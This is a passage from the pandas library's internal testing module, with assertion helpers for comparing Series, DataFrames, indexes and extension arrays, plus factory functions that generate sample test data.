if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes"
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(lc, rc, obj=f"{obj}.categories")
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
kwargs = {}
if left._left.dtype.kind in ["m", "M"]:
# We have a DatetimeArray or TimedeltaArray
kwargs["check_freq"] = False
assert_equal(left._left, right._left, obj=f"{obj}.left", **kwargs)
assert_equal(left._right, right._right, obj=f"{obj}.left", **kwargs)
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape
)
diff = 0
for left_arr, right_arr in zip(left, right):
# count up differences
if not array_equivalent(left_arr, right_arr, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
Whether to compare number exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
Examples
--------
>>> from pandas.testing import assert_extension_array_equal
>>> a = pd.Series([1, 2, 3, 4])
>>> b, c = a.array, a.array
>>> assert_extension_array_equal(b, c)
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
Examples
--------
>>> from pandas.testing import assert_series_equal
>>> a = pd.Series([1, 2, 3, 4])
>>> b = pd.Series([1, 2, 3, 4])
>>> assert_series_equal(a, b)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact and is_numeric_dtype(left.dtype) and is_numeric_dtype(right.dtype):
# Only check exact if dtype is numeric
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype_and_needs_i8_conversion(
left.dtype, right.dtype
) or is_extension_array_dtype_and_needs_i8_conversion(right.dtype, left.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif needs_i8_conversion(left.dtype) and needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}"
)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
if check_like:
left, right = left.reindex_like(right), right
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def is_extension_array_dtype_and_needs_i8_conversion(left_dtype, right_dtype) -> bool:
"""
Checks that we have the combination of an ExtensionArraydtype and
a dtype that should be converted to int64
Returns
-------
bool
Related to issue #37609
"""
return is_extension_array_dtype(left_dtype) and needs_i8_conversion(right_dtype)
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
# pandas\_testing.py:1986: error: Cannot call function of unknown type
yield make_index_func(k=k) # type: ignore[operator]
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
